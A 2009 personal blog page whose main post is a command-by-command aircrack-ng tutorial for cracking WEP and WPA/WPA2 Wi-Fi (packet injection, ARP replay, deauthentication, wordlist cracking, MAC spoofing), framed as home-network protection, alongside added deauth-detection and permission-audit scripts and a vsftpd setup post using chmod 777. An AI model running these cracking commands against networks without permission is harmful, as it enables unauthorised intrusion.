Sunday, October 25, 2009

The LCD thread

A good place to start when you are looking for a new monitor.

How to protect your wireless home network

To understand that, we will first learn how to actually break them ;-)
It is recommended that you experiment with your own home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, remember to get permission from the owner before playing with it.
I will use Ubuntu (Gnome desktop) under the root account with some non-default tools:
apt-get install nmap macchanger
You will need to install aircrack-ng and the adapter drivers from source to get the latest versions.

I got an Edimax EW-7318USg for ~$30, one of the recommended devices.

Shortcuts I will use with the aircrack-ng suite:
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of a client already associated with the AP (needed for the DeAuth attack), ex: 012345abcdef
The interface I will use is rausb0.

Simple WEP Crack

Put the card into monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0

And let's start scanning
airodump-ng rausb0

Pick the target network and test whether we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
Test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0

Start capturing IVs for the target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0

Fake authentication with the access point, otherwise it will drop our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0

Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets captured from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or make the access point rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use a ready-to-send packet
aireplay-ng -2 -r arp-request rausb0

Once you have collected 40K to 80K data packets, we can try to crack the key
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method

When no wireless clients exist

Fragmentation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0

You will get a "fragment-0203-180343.xor" file for the next step.

Use packetforge-ng to create an ARP packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k -l -y fragment-0203-180343.xor -w arp-request

You can inspect the created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), decrypt the packet and make sure it is correct
airdecap-ng -e AP-NAM -w arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec

How to Crack WPA/WPA2

The only way is to capture the 4-way authentication handshake
Deauth a connected client once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0

For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap

Other useful stuff

MAC address change - the manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0

But it is easier with
macchanger --mac 00:11:22:33:44:55

Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M

Scan network for devices
nmap -sP

Scan services on specific device
nmap -NP

Windows information and shares (if open)
smbclient -L \\
smbclient -L \\ -U Guest -W workgroup

Kernel modules control
lsmod | grep 73
modprobe rt73

Trace packets with
tcpdump -n -vvv -s0 -e -i | grep -i -E "(RA:|Authentication|ssoc)"

Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager


aircrack-ng tutorials and FAQ
Latest nmap

So, to protect your wireless network: don't use WEP; use WPA/WPA2 with a long and complicated password; MAC filtering will only delay an attacker for a while (until he sees the MAC of one of the authenticated clients); hiding the SSID doesn't help at all.
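The deauth step above (aireplay-ng -0) and the tcpdump trace under "Other useful stuff" are also what a defender can watch for: an AP legitimately sends a client a single deauth when it leaves, while the attack shows up as a burst of deauth frames to the same client within a second or two. Below is an added example (mine, not from the blog or the aircrack-ng project) in Python that parses tcpdump-style 802.11 management-frame lines and flags such bursts. The trace lines are constructed, the MAC addresses are placeholders, and the "5 frames in 2 seconds" threshold is an assumed tuning value.

```python
import re
from collections import defaultdict, deque

# Regex for one 802.11 management frame as tcpdump -e prints it: timestamp,
# radio details we skip, then BSSID/DA/SA and the frame subtype.
FRAME_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+).*?"
    r"BSSID:(?P<bssid>[0-9a-f:]{17}) "
    r"DA:(?P<da>[0-9a-f:]{17}|Broadcast) "
    r"SA:(?P<sa>[0-9a-f:]{17}) "
    r"(?P<type>DeAuthentication|Disassociation|Authentication|Assoc Request|Assoc Response)",
    re.IGNORECASE,
)

# Constructed trace (placeholder MACs, modelled on tcpdump 802.11 output): one
# normal authentication, one ordinary deauth to client ...:02, then a burst of
# six deauths to client ...:01 within half a second, which is how a forged
# deauth flood looks to a sniffer sitting on the AP's channel.
SAMPLE_TRACE = """\
18:03:40.100000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:01 SA:00:11:22:33:44:55 Authentication (Open System)-2: Successful
18:03:40.200000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:02 SA:00:11:22:33:44:55 DeAuthentication: Deauthenticated because sending station is leaving
18:03:40.300000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:01 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
18:03:40.400000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:01 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
18:03:40.500000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:01 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
18:03:40.600000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:01 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
18:03:40.700000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:01 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
18:03:40.800000 1.0 Mb/s 2462 MHz 11g -41dB signal BSSID:00:11:22:33:44:55 DA:aa:bb:cc:dd:ee:01 SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
"""


def ts_seconds(ts):
    """Convert HH:MM:SS.ffffff to seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_frame(line):
    """Return the fields of a management-frame line, or None for anything else."""
    m = FRAME_RE.search(line)
    if m is None:
        return None
    return {
        "t": ts_seconds(m.group("ts")),
        "bssid": m.group("bssid").lower(),
        "da": m.group("da").lower(),
        "sa": m.group("sa").lower(),
        "type": m.group("type").lower(),
    }


def detect_deauth_storms(lines, window=2.0, threshold=5):
    """Flag each (BSSID, client) pair that receives >= threshold deauth or
    disassoc frames within `window` seconds. One alert per pair: frames after
    the first alert are ignored so a long flood produces a single alert."""
    recent = defaultdict(deque)   # (bssid, client) -> timestamps inside the window
    alerted = set()
    alerts = []
    for line in lines:
        f = parse_frame(line)
        if f is None or f["type"] not in ("deauthentication", "disassociation"):
            continue
        key = (f["bssid"], f["da"])
        q = recent[key]
        q.append(f["t"])
        while q and f["t"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": key[0], "client": key[1], "count": len(q),
                           "first": q[0], "last": f["t"]})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_storms(SAMPLE_TRACE.splitlines()):
        print(f"deauth storm: AP {a['bssid']} -> client {a['client']}: "
              f"{a['count']} frames in {a['last'] - a['first']:.2f}s")
```

Feed it live data with something like the tcpdump command from "Other useful stuff" piped in (`tcpdump -l -n -e -i <monitor-interface> | python3 detect.py`, reading sys.stdin instead of SAMPLE_TRACE). The single deauth to client ...:02 is never flagged, which is the point of counting per client inside a time window rather than alerting on every deauth frame.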

UPD: Good news from the aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc.)
WPA Cracker - cloud cracking service

Sunday, October 11, 2009

Adobe Photoshop Color management

Adobe Photoshop Color management for dummies (like me)

Tuesday, October 6, 2009

VSFTPD and virtual user

I will show you how to install an FTP server on RedHat Linux and create a virtual user "upload" with password "kuku" for uploading and downloading files.

First, you need to run
[alexey@blogger ~]$ sudo yum install vsftpd
I got version 2.0.1
[alexey@blogger ~]$ vsftpd -v
vsftpd: version 2.0.1
then let's back up the original config
[alexey@blogger ~]$ sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.default
now we can edit the config for our needs; open vi
[alexey@blogger ~]$ sudo vi /etc/vsftpd/vsftpd.conf
and paste the following
ftpd_banner=Welcome to my FTP!

Now we should create the virtual users' authentication file; you can use Apache's tools.
'-c' creates a new file (drop it when adding more users, or the file is overwritten), '-b' takes the password from the command line
[alexey@blogger ~]$ /usr/local/httpd/bin/htpasswd -cb /path/to/ftp/users upload kuku
Adding password for user default

Now we need to tell vsftpd how to check users; it uses PAM, as described in
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
auth required item=user sense=deny file=/etc/vsftpd.ftpusers onerr=succeed
auth required service=system-auth
auth required
account required service=system-auth
session required service=system-auth
back it up with
[alexey@blogger ~]$ sudo cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.default
and paste the following
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
# MaggaPlus access
auth required pwdfile /path/to/ftp/users
account required
[alexey@blogger ~]$

At this point you can start the daemon with
[alexey@blogger ~]$ sudo /etc/init.d/vsftpd start
and if everything is ok, try to connect to your new FTP.

I ran into a problem: even when I used the username and password pair I had just created, it always returned "Invalid login". I thought the problem was in the users file and rewrote it many times. But the pwdfile module was simply missing, which I found out from
[alexey@blogger ~]$ sudo tail /var/log/messages
Oct 5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct 5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/
Oct 5 20:21:59 blogger vsftpd[27288]: PAM [dlerror: /lib/security/ cannot open shared object file: No such file
Oct 5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/
All PAM plugins live in
[alexey@blogger ~]$ ll /lib/security/
total 1884
-rwxr-xr-x 1 root root 15560 May 12 2006
-rwxr-xr-x 1 root root 52334 Oct 13 2004
-rwxr-xr-x 1 root root 6004 May 12 2006
And it was missing :-(
I found it and installed it
[alexey@blogger ~]$ sudo rpm -i pam-pam_pwdfile-0.99-2.i586.rpm
warning: pam-pam_pwdfile-0.99-2.i586.rpm: V3 DSA signature: NOKEY, key ID 1bbd5459
Now it is fine, and FTP auth works!
[alexey@blogger ~]$ ll /lib/security/
-rwxr-xr-x 1 root root 14572 Jul 30 2004 /lib/security/
Make sure the FTP root is readable and writable for the specified user (note that 777 also makes it writable by every local account on the box, not just the upload user; on a shared machine, give the directory to the account vsftpd writes files as and use a tighter mode)
[alexey@blogger ~]$ chmod 777 -R /path/to/ftp-directory
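Two things in this setup are worth re-checking once it works: the users file holds password hashes that anyone who can read it can attack offline, and chmod 777 leaves the FTP directory writable by every local account. The following Python script is an added example (mine, not from the blog or the vsftpd project) that audits both: it expects user:hash lines as htpasswd writes them, flags a users file that group or others can read, and flags any world-writable directory or file under the FTP root. The paths, the placeholder hash and the modes demo() applies are constructed; which local account vsftpd writes uploads as depends on its guest-user settings, which the post does not cover.

```python
import os
import stat
import tempfile


def check_entries(lines):
    """Validate the shape of htpasswd/pam_pwdfile-style 'user:hash' lines."""
    problems = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line:
            continue
        parts = line.split(":")
        if len(parts) != 2 or not parts[0] or not parts[1]:
            problems.append(f"line {n}: expected 'user:hash'")
        elif len(parts[1]) < 13:
            # 13 characters is the shortest crypt(3) form (DES); anything
            # shorter is almost certainly a plaintext password, which
            # pam_pwdfile will never match and which should not be on disk.
            problems.append(f"line {n}: hash for {parts[0]!r} too short, looks like plaintext")
    return problems


def audit_users_file(path):
    """Check the users file's permissions, then its entries."""
    problems = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    # Nobody but the owner (root, which vsftpd's PAM stack runs as) needs to read hashes.
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        problems.append(f"{path}: mode {oct(mode)} lets group/others read it; use 0600")
    with open(path) as fh:
        problems += audit_prefix(path, check_entries(fh))
    return problems


def audit_prefix(path, problems):
    """Prefix entry-level findings with the file name."""
    return [f"{path}: {p}" for p in problems]


def audit_ftp_root(root):
    """Report every world-writable directory or file under the FTP root."""
    problems = []
    for dirpath, _dirs, files in os.walk(root):
        for p in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            mode = stat.S_IMODE(os.stat(p).st_mode)
            if mode & stat.S_IWOTH:
                problems.append(f"{p}: mode {oct(mode)} is world-writable")
    return problems


def demo():
    """Build a throwaway layout (constructed paths, placeholder hash) and
    audit it twice: as 'chmod 777 -R' leaves it, and after tightening."""
    with tempfile.TemporaryDirectory() as tmp:
        users = os.path.join(tmp, "users")
        ftp_root = os.path.join(tmp, "ftp")
        os.mkdir(ftp_root)
        with open(users, "w") as fh:
            fh.write("upload:AbCdEfGhIjKlM\n")   # placeholder 13-char hash, not a real one
        os.chmod(users, 0o644)                   # htpasswd's default umask result
        os.chmod(ftp_root, 0o777)                # what 'chmod 777 -R' leaves behind
        before = audit_users_file(users) + audit_ftp_root(ftp_root)
        os.chmod(users, 0o600)
        os.chmod(ftp_root, 0o750)                # owner (the account vsftpd writes as) keeps write
        after = audit_users_file(users) + audit_ftp_root(ftp_root)
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before tightening:", *before, sep="\n  ")
    print("after tightening:", after or "no problems")
```

Run it as root against the real paths (`audit_users_file("/path/to/ftp/users")` and `audit_ftp_root("/path/to/ftp-directory")`) after every htpasswd or chmod change; an empty result from both is the state you want before exposing the service.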

[alexey@blogger ~]$ ftp localhost
Connected to localhost (
220 Welcome to my FTP!
Name (blogger:alexey): upload
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> close
221 Goodbye.
ftp> bye
[alexey@blogger ~]$

Information used